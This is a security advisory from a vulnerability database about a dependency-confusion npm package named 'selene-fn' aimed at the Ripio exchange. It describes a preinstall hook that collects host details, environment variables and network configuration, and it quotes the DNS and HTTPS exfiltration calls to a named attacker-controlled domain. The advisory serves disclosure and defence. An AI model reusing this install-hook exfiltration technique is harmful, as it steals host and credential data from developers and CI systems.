VDB

GCVE-110-OSM-2026-1246

GCVE-110-OSM-2026-1246
Advisory PublishedCVSS 5.4/10
Vulnetix · Advisory published April 1, 2026
Dependency confusion package targeting the Ripio cryptocurrency exchange's internal 'selene-fn' namespace. At install time, the preinstall script exfiltrates a full host fingerprint — hostname, username, user ID, working directory, home directory, OS platform/arch/release, CPU count, memory stats, all network interface MAC addresses and IP addresses, full PATH/HOME/USER/SHELL/CI/DOCKER environment variables, /etc/resolv.conf DNS config, and full 'ip a' output — to the attacker-controlled OAST domain d76g26h8fmqqie6ludug3361yycypwu7i.oast.fun via two channels: a DNS lookup embedding base64-encoded data in the subdomain label, and an HTTPS POST. Version number 99.x.x is chosen to win the dependency confusion race against any internal Ripio package of the same name. package.json declares 'preinstall: node callback.js'. callback.js builds a JSON object with 28 fields: package name, researcher identity ('r76o4'), target program ('ripio (HackerOne)'), os.hostname(), execSync('whoami'), execSync('id'), process.cwd(), os.homedir(), os.tmpdir(), os.platform(), os.arch(), os.release(), os.type(), os.cpus().length, os.totalmem(), os.freemem(), os.uptime(), os.networkInterfaces() (all interfaces including MACs), process.version, process.env.PATH, process.env.HOME, process.env.USER, process.env.SHELL, process.env.CI, process.env.DOCKER, process.env.HOSTNAME, execSync('cat /etc/resolv.conf'), execSync('ip a'). JSON is base64-encoded. DNS exfil: dns.resolve('slfn.<60-char-base64-prefix>.d76g26h8fmqqie6ludug3361yycypwu7i.oast.fun'). HTTP exfil: HTTPS POST to /selene-fn on the same domain, with HTTP port 80 fallback.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
5.4/10
Medium · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Affected Products

VendorProductVersionsPlatforms
unknownselene-fn

References

vendor

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›